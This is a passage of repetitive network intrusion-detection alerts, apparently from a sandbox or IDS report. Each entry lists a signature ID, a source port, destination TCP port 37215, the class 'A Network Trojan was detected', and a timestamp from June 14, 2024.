                SID:2829579
                Source Port:38124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914348
                SID:2829579
                Source Port:39090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546806
                SID:2835222
                Source Port:48212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.684775
                SID:2835222
                Source Port:52604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.178015
                SID:2835222
                Source Port:47832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517630
                SID:2829579
                Source Port:42016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.625500
                SID:2835222
                Source Port:33974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321567
                SID:2835222
                Source Port:55790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563111
                SID:2835222
                Source Port:36702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977705
                SID:2835222
                Source Port:36880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115741
                SID:2835222
                Source Port:39644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367546
                SID:2829579
                Source Port:39730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503865
                SID:2835222
                Source Port:33944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034072
                SID:2835222
                Source Port:45938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150031
                SID:2835222
                Source Port:43628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913907
                SID:2829579
                Source Port:34634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150456
                SID:2829579
                Source Port:45512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.176586
                SID:2835222
                Source Port:47858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.883213
                SID:2829579
                Source Port:51960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.022237
                SID:2835222
                Source Port:57170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828778
                SID:2835222
                Source Port:32936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.813386
                SID:2829579
                Source Port:37230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383527
                SID:2835222
                Source Port:38960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183323
                SID:2829579
                Source Port:58814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675927
                SID:2835222
                Source Port:46542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806698
                SID:2829579
                Source Port:59878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828178
                SID:2829579
                Source Port:44004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150016
                SID:2829579
                Source Port:54394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943319
                SID:2835222
                Source Port:37746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776773
                SID:2835222
                Source Port:36710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846590
                SID:2835222
                Source Port:38618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.325235
                SID:2829579
                Source Port:40948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967337
                SID:2835222
                Source Port:60066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914268
                SID:2835222
                Source Port:46540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663341
                SID:2829579
                Source Port:39700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980278
                SID:2835222
                Source Port:42980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967619
                SID:2835222
                Source Port:45012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761863
                SID:2835222
                Source Port:37604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452756
                SID:2835222
                Source Port:49776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791459
                SID:2835222
                Source Port:50274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229104
                SID:2835222
                Source Port:58560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.203056
                SID:2835222
                Source Port:53466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.723855
                SID:2829579
                Source Port:54856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880990
                SID:2835222
                Source Port:33462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662368
                SID:2829579
                Source Port:60112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941768
                SID:2829579
                Source Port:36786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021637
                SID:2835222
                Source Port:53864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230315
                SID:2829579
                Source Port:39832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663629
                SID:2835222
                Source Port:33880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701546
                SID:2829579
                Source Port:39164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001889
                SID:2835222
                Source Port:52244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944056
                SID:2829579
                Source Port:33256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245902
                SID:2829579
                Source Port:48526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055261
                SID:2829579
                Source Port:39184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340728
                SID:2829579
                Source Port:42230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663611
                SID:2835222
                Source Port:52620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182109
                SID:2829579
                Source Port:52294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565161
                SID:2829579
                Source Port:33942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018479
                SID:2829579
                Source Port:43592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.385605
                SID:2829579
                Source Port:59232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944141
                SID:2835222
                Source Port:43832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366246
                SID:2835222
                Source Port:57656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968057
                SID:2829579
                Source Port:43248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661180
                SID:2835222
                Source Port:52526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.685159
                SID:2829579
                Source Port:36190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163952
                SID:2835222
                Source Port:38096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.902425
                SID:2835222
                Source Port:43276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.425074
                SID:2835222
                Source Port:33138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.947040
                SID:2835222
                Source Port:46246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505025
                SID:2829579
                Source Port:54800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811604
                SID:2835222
                Source Port:43576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808285
                SID:2829579
                Source Port:43648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292351
                SID:2829579
                Source Port:41080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733595
                SID:2829579
                Source Port:60396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244708
                SID:2829579
                Source Port:59112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022573
                SID:2835222
                Source Port:35128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023878
                SID:2829579
                Source Port:60664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368318
                SID:2829579
                Source Port:39002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.203273
                SID:2835222
                Source Port:39416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201565
                SID:2835222
                Source Port:35134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846468
                SID:2829579
                Source Port:40600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564331
                SID:2835222
                Source Port:48736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411807
                SID:2835222
                Source Port:35382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419950
                SID:2835222
                Source Port:47006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368921
                SID:2829579
                Source Port:48706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028098
                SID:2829579
                Source Port:43492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716821
                SID:2835222
                Source Port:35588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545026
                SID:2829579
                Source Port:46266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942605
                SID:2829579
                Source Port:58740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971536
                SID:2829579
                Source Port:59804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827708
                SID:2829579
                Source Port:47644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408435
                SID:2829579
                Source Port:59272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420350
                SID:2829579
                Source Port:57012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504787
                SID:2835222
                Source Port:43534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676987
                SID:2829579
                Source Port:57868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253397
                SID:2829579
                Source Port:49512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.643825
                SID:2829579
                Source Port:39074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763467
                SID:2835222
                Source Port:59034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848161
                SID:2829579
                Source Port:42268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152405
                SID:2835222
                Source Port:50474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660480
                SID:2829579
                Source Port:33534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.344448
                SID:2835222
                Source Port:53906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368728
                SID:2829579
                Source Port:33658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.069811
                SID:2835222
                Source Port:60984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.147006
                SID:2835222
                Source Port:45428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565882
                SID:2835222
                Source Port:55330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326358
                SID:2829579
                Source Port:47078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146906
                SID:2829579
                Source Port:40716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023329
                SID:2829579
                Source Port:49000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.686691
                SID:2829579
                Source Port:52960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.723990
                SID:2835222
                Source Port:47556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.722087
                SID:2829579
                Source Port:53102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.642755
                SID:2829579
                Source Port:40506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184836
                SID:2835222
                Source Port:47156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.015704
                SID:2835222
                Source Port:47868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295150
                SID:2829579
                Source Port:49592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.002097
                SID:2829579
                Source Port:36204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.145819
                SID:2829579
                Source Port:51848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034633
                SID:2835222
                Source Port:34706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230960
                SID:2835222
                Source Port:34352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.016156
                SID:2835222
                Source Port:47188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034319
                SID:2829579
                Source Port:54042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341755
                SID:2835222
                Source Port:44898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012217
                SID:2829579
                Source Port:58146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365714
                SID:2835222
                Source Port:59818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183445
                SID:2835222
                Source Port:48878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033323
                SID:2835222
                Source Port:45686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421113
                SID:2829579
                Source Port:52380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470032
                SID:2829579
                Source Port:42860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662099
                SID:2829579
                Source Port:37748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022683
                SID:2829579
                Source Port:36220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879813
                SID:2835222
                Source Port:55768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017115
                SID:2835222
                Source Port:41332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790036
                SID:2835222
                Source Port:34896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018092
                SID:2835222
                Source Port:43026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760980
                SID:2829579
                Source Port:46856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.727171
                SID:2829579
                Source Port:41870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859607
                SID:2829579
                Source Port:50378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878779
                SID:2835222
                Source Port:49020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182924
                SID:2835222
                Source Port:51550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366730
                SID:2829579
                Source Port:52556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.082357
                SID:2835222
                Source Port:60872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.450704
                SID:2829579
                Source Port:39306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944816
                SID:2835222
                Source Port:52548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182701
                SID:2829579
                Source Port:41678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013983
                SID:2829579
                Source Port:45582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054129
                SID:2829579
                Source Port:47768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779810
                SID:2835222
                Source Port:41924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.147902
                SID:2835222
                Source Port:45870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859729
                SID:2835222
                Source Port:33294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968999
                SID:2835222
                Source Port:54050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.078504
                SID:2835222
                Source Port:41312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663384
                SID:2829579
                Source Port:44680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804759
                SID:2835222
                Source Port:60480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021280
                SID:2835222
                Source Port:47904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028791
                SID:2829579
                Source Port:48646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290633
                SID:2835222
                Source Port:58906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545865
                SID:2829579
                Source Port:51098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.667723
                SID:2829579
                Source Port:49208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.788829
                SID:2829579
                Source Port:41544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761807
                SID:2829579
                Source Port:38484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033956
                SID:2835222
                Source Port:56250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662188
                SID:2829579
                Source Port:33150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.941957
                SID:2835222
                Source Port:57644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.083214
                SID:2835222
                Source Port:38380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969316
                SID:2829579
                Source Port:55286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.502938
                SID:2829579
                Source Port:53430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.967532
                SID:2835222
                Source Port:34724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663092
                SID:2829579
                Source Port:47832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146848
                SID:2835222
                Source Port:58176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322335
                SID:2829579
                Source Port:49404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180621
                SID:2829579
                Source Port:48274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115322
                SID:2835222
                Source Port:33312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941474
                SID:2835222
                Source Port:58502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662715
                SID:2835222
                Source Port:56660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290573
                SID:2835222
                Source Port:39146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.449309
                SID:2835222
                Source Port:48018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759409
                SID:2835222
                Source Port:49256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.473568
                SID:2829579
                Source Port:58820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942302
                SID:2829579
                Source Port:35944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.897307
                SID:2829579
                Source Port:58152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.022047
                SID:2829579
                Source Port:40388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164194
                SID:2835222
                Source Port:44200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160327
                SID:2835222
                Source Port:52624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.667077
                SID:2829579
                Source Port:58810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181614
                SID:2835222
                Source Port:53320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143054
                SID:2829579
                Source Port:57788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.224673
                SID:2835222
                Source Port:33590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338041
                SID:2829579
                Source Port:54162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646383
                SID:2835222
                Source Port:49376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827944
                SID:2829579
                Source Port:57000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913282
                SID:2829579
                Source Port:56442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017154
                SID:2835222
                Source Port:47530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703573
                SID:2835222
                Source Port:58126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032548
                SID:2829579
                Source Port:42600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.385739
                SID:2835222
                Source Port:55856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000628
                SID:2835222
                Source Port:43738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184045
                SID:2829579
                Source Port:53454
                Destination Port:37215
